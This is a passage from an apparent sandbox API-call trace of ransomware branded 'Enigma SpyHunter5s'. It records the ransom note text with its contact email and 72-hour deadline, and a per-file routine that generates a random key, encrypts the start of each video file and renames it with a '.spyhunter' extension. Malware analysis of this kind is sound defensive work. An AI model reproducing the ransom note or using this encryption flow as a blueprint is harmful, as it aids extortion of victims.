dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.324] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.324] WriteFile (in: hFile=0xa0, lpBuffer=0x248efbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f0e8, lpOverlapped=0x0 | out: lpBuffer=0x248efbf*, lpNumberOfBytesWritten=0x248f0e8*=0x127, lpOverlapped=0x0) returned 1 [0147.341] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.341] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f0e8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f0e8*=0x2ac, lpOverlapped=0x0) returned 1 [0147.342] CloseHandle (hObject=0xa0) returned 1 [0147.342] GetProcessHeap () returned 0x2c0000 [0147.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f980 | out: hHeap=0x2c0000) returned 1 [0147.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f088 | out: pbBuffer=0x248f088) returned 1 [0147.342] GetProcessHeap () returned 0x2c0000 [0147.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f080*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f080*=0x30) returned 1 [0147.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\V5g01mbCnElrf4hawNq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\v5g01mbcnelrf4hawnq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\V5g01mbCnElrf4hawNq.mp4") returned 69 [0147.343] StrStrW (lpFirst="V5g01mbCnElrf4hawNq.mp4", lpSrch=".txt") returned 0x0 [0147.349] GetProcessHeap () returned 0x2c0000 [0147.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.349] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f044*=0x2800, lpOverlapped=0x0) returned 1 [0147.353] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.353] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f044*=0x2800, lpOverlapped=0x0) returned 1 [0147.353] GetProcessHeap () returned 0x2c0000 [0147.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.353] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.353] WriteFile (in: hFile=0xa0, lpBuffer=0x248f084*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x248f084*, lpNumberOfBytesWritten=0x248f044*=0x4, lpOverlapped=0x0) returned 1 [0147.353] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f044*=0x30, lpOverlapped=0x0) returned 1 [0147.353] CloseHandle (hObject=0xa0) returned 1 [0147.353] GetProcessHeap () returned 0x2c0000 [0147.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.354] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\V5g01mbCnElrf4hawNq.mp4.spyhunter") returned 79 [0147.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\V5g01mbCnElrf4hawNq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\v5g01mbcnelrf4hawnq.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\V5g01mbCnElrf4hawNq.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\v5g01mbcnelrf4hawnq.mp4.spyhunter")) returned 1 [0147.354] GetProcessHeap () returned 0x2c0000 [0147.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.355] GetProcessHeap () returned 0x2c0000 [0147.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.355] GetProcessHeap () returned 0x2c0000 [0147.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee680 | out: hHeap=0x2c0000) returned 1 [0147.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.356] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.356] WriteFile (in: hFile=0xa0, lpBuffer=0x248efb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f0e0, lpOverlapped=0x0 | out: lpBuffer=0x248efb7*, lpNumberOfBytesWritten=0x248f0e0*=0x127, lpOverlapped=0x0) returned 1 [0147.356] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.356] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f0e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f0e0*=0x2ac, lpOverlapped=0x0) returned 1 [0147.357] CloseHandle (hObject=0xa0) returned 1 [0147.357] GetProcessHeap () returned 0x2c0000 [0147.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fec8 | out: hHeap=0x2c0000) returned 1 [0147.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.357] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.357] WriteFile (in: hFile=0xa0, lpBuffer=0x248efb3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x248efb3*, lpNumberOfBytesWritten=0x248f0dc*=0x127, lpOverlapped=0x0) returned 1 [0147.358] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.358] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f0dc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f0dc*=0x2ac, lpOverlapped=0x0) returned 1 [0147.358] CloseHandle (hObject=0xa0) returned 1 [0147.358] GetProcessHeap () returned 0x2c0000 [0147.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2effc38 | out: hHeap=0x2c0000) returned 1 [0147.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f078 | out: pbBuffer=0x248f078) returned 1 [0147.359] GetProcessHeap () returned 0x2c0000 [0147.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f070*=0x30) returned 1 [0147.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\xtbDu2DeZUaRR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\xtbdu2dezuarr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\xtbDu2DeZUaRR.mkv") returned 92 [0147.359] StrStrW (lpFirst="xtbDu2DeZUaRR.mkv", lpSrch=".txt") returned 0x0 [0147.359] GetProcessHeap () returned 0x2c0000 [0147.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.359] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f034*=0x2800, lpOverlapped=0x0) returned 1 [0147.360] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.360] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f034*=0x2800, lpOverlapped=0x0) returned 1 [0147.360] GetProcessHeap () returned 0x2c0000 [0147.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.360] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.360] WriteFile (in: hFile=0xa0, lpBuffer=0x248f074*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x248f074*, lpNumberOfBytesWritten=0x248f034*=0x4, lpOverlapped=0x0) returned 1 [0147.361] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f034*=0x30, lpOverlapped=0x0) returned 1 [0147.361] CloseHandle (hObject=0xa0) returned 1 [0147.361] GetProcessHeap () returned 0x2c0000 [0147.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.361] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\xtbDu2DeZUaRR.mkv.spyhunter") returned 102 [0147.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\xtbDu2DeZUaRR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\xtbdu2dezuarr.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\xtbDu2DeZUaRR.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\xtbdu2dezuarr.mkv.spyhunter")) returned 1 [0147.362] GetProcessHeap () returned 0x2c0000 [0147.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.362] GetProcessHeap () returned 0x2c0000 [0147.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.362] GetProcessHeap () returned 0x2c0000 [0147.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62278 | out: hHeap=0x2c0000) returned 1 [0147.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f078 | out: pbBuffer=0x248f078) returned 1 [0147.362] GetProcessHeap () returned 0x2c0000 [0147.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.362] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f070*=0x30) returned 1 [0147.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\epAkpMwSM_Ws.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\epakpmwsm_ws.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\epAkpMwSM_Ws.flv") returned 91 [0147.362] StrStrW (lpFirst="epAkpMwSM_Ws.flv", lpSrch=".txt") returned 0x0 [0147.363] GetProcessHeap () returned 0x2c0000 [0147.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.363] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f034*=0x2800, lpOverlapped=0x0) returned 1 [0147.363] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.363] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f034*=0x2800, lpOverlapped=0x0) returned 1 [0147.364] GetProcessHeap () returned 0x2c0000 [0147.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.364] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.364] WriteFile (in: hFile=0xa0, lpBuffer=0x248f074*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x248f074*, lpNumberOfBytesWritten=0x248f034*=0x4, lpOverlapped=0x0) returned 1 [0147.364] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f034, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f034*=0x30, lpOverlapped=0x0) returned 1 [0147.364] CloseHandle (hObject=0xa0) returned 1 [0147.364] GetProcessHeap () returned 0x2c0000 [0147.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.364] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\epAkpMwSM_Ws.flv.spyhunter") returned 101 [0147.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\epAkpMwSM_Ws.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\epakpmwsm_ws.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\epAkpMwSM_Ws.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\epakpmwsm_ws.flv.spyhunter")) returned 1 [0147.365] GetProcessHeap () returned 0x2c0000 [0147.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.366] GetProcessHeap () returned 0x2c0000 [0147.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.366] GetProcessHeap () returned 0x2c0000 [0147.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafcb8 | out: hHeap=0x2c0000) returned 1 [0147.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f070 | out: pbBuffer=0x248f070) returned 1 [0147.366] GetProcessHeap () returned 0x2c0000 [0147.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f068*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f068*=0x30) returned 1 [0147.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\6EOebm VxznfIW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\6eoebm vxznfiw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\6EOebm VxznfIW.flv") returned 93 [0147.367] StrStrW (lpFirst="6EOebm VxznfIW.flv", lpSrch=".txt") returned 0x0 [0147.367] GetProcessHeap () returned 0x2c0000 [0147.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.367] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f02c*=0x2800, lpOverlapped=0x0) returned 1 [0147.368] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.368] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f02c*=0x2800, lpOverlapped=0x0) returned 1 [0147.368] GetProcessHeap () returned 0x2c0000 [0147.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.368] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.368] WriteFile (in: hFile=0xa0, lpBuffer=0x248f06c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x248f06c*, lpNumberOfBytesWritten=0x248f02c*=0x4, lpOverlapped=0x0) returned 1 [0147.368] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f02c*=0x30, lpOverlapped=0x0) returned 1 [0147.368] CloseHandle (hObject=0xa0) returned 1 [0147.369] GetProcessHeap () returned 0x2c0000 [0147.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.369] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\6EOebm VxznfIW.flv.spyhunter") returned 103 [0147.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\6EOebm VxznfIW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\6eoebm vxznfiw.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\6EOebm VxznfIW.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\6eoebm vxznfiw.flv.spyhunter")) returned 1 [0147.369] GetProcessHeap () returned 0x2c0000 [0147.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.370] GetProcessHeap () returned 0x2c0000 [0147.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.370] GetProcessHeap () returned 0x2c0000 [0147.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62170 | out: hHeap=0x2c0000) returned 1 [0147.370] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f070 | out: pbBuffer=0x248f070) returned 1 [0147.370] GetProcessHeap () returned 0x2c0000 [0147.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, 